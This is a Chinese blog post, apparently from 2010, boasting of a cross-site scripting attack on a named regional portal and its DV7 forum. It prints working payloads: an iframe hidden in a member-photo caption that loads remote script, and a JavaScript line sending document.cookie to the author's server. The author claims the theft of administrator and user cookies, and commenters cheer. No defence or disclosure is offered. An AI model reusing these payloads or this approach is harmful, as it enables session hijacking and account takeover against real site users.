They be actin like they drunk
这个站是我们老家的一个门户网站,今天没有事就又上去翻了翻,经过这么多年,网站已被好些新出道的门户给分流了,变得冷清了。此次只是温习很久之前的一次功课。写下来,分享给大家,也算是2010年初的一点小礼物,几年了还未修复那小毛病。


      论坛用的DV7,老东东,补丁一打好结实……lol.gif
     
http://www.deepinlove.net/blog//uploadfiles/1_81275.jpg


         曾经的辉煌


http://www.deepinlove.net/blog//uploadfiles/2_10746.jpg


唉,跨站,挂马为何到如今还如此流行

    DV7的代码编写不成熟,虽然补丁都打了,但是死穴跨站没补丁可补。

    首页跨站拿COOKIE……一看这都感觉很俗了。你想挂马也成。

    跨站代码如下:
    
    http://www.hctop.com/bbs/messanger.asp?action=new&touser=dddd"><script src="http://www.keepinlove.cn/1.js" </script>&id= 
    
    有没有更好的,我不知道,反正这个跨站地方是我自己找的。

    这个只能在BBS里面用,发信啥的,叫管理员看,明眼人一看就识破了,所以我放弃了,无声无息才好,一般上这网站,就会先进首页,然后点论坛进/bbs目录,这时COOKIE开始启用,识别身份,但是首页不在/bbs路径下,所以就不会调用COOKIE……跨不出来COOKIE

       TOP首页有个会员照片,可以自由上传,无任何限制或过滤,因为是直接写数据库的,但是也可以跨,呵呵,没有这一跨,我的无声无息恐怕不好实现呀……

      提交美女照片对比几次发现,照片说明那里是直接显在首页上的,于是乎,对应代码如下:
    

     ddd </td><Iframe src='http://www.hctop.com/bbs/messanger.asp?action=new&touser=dddd"><script src="http://www.keepinlove.cn/1.js" </script>&id=' width="0" heitht="0"></IFRAME><td>

        只需填写名字,再把这代码往照片说明里一弄,百度个MM图片,传上去嘿嘿……
        
      总结相关代码如下:
      跨站代码:

      ddd </td><Iframe src='http://www.hctop.com/bbs/messanger.asp?action=new&touser=dddd"><script src="http://www.keepinlove.cn/1.js" </script>&id=' width="0" heitht="0"></IFRAME><td>

        1.JS脚本代码:

     (new Image).src='http://www.keepinlove.cn/1.php?cookie='+escape(document.cookie);

         1.php代码:


 
http://www.deepinlove.net/blog//uploadfiles/3_38843.jpg



                     战果
     得到前台管理员COOKIE,登陆前台,N个用户的COOKIE到手,只可希想尽办法没进后台。BUT,想搞破坏的话,足够了。可以挂个朔雪,嘿嘿,一天删百十个老帖,慢慢……慢慢的,温水煮青蛙……我真够阴的……sad.gif还好只是说说。

http://www.deepinlove.net/blog//uploadfiles/hctop_40696.txt

       上面那个是以前弄的时候的战果,
现在挂上去,等了两小时,可怜的人啊,竟然没有一个保存COOKIE的登陆网站.
实在是比我BLOG还冷……

        对了,管理员帐号好牛B,hcga110   难道是警察做的网站?wink.gif
此文的引用地址:
5 条评论

# 1: January 24, 2010, 10:35 am, ....... said:

那是潢川网警里帐号.不是站长里

# 2: January 24, 2010, 2:13 pm, asas said:

哦,网警?我喜欢!呵呵,龙王是你吧?用这个号来删贴应该没人敢说话,更爽啊!哈哈

# 3: June 23, 2011, 8:57 pm, Delonte said:

Yup, that'll do it. You have my apprecitaion.

# 4: April 4, 2014, 9:19 pm, MichaelGom said:

Hello. And Bye.

# 5: August 8, 2016, 9:48 am, Christy said:

These topics are so cofsnniug but this helped me get the job done.

添加评论

昵称 *

E-mail

Remember Me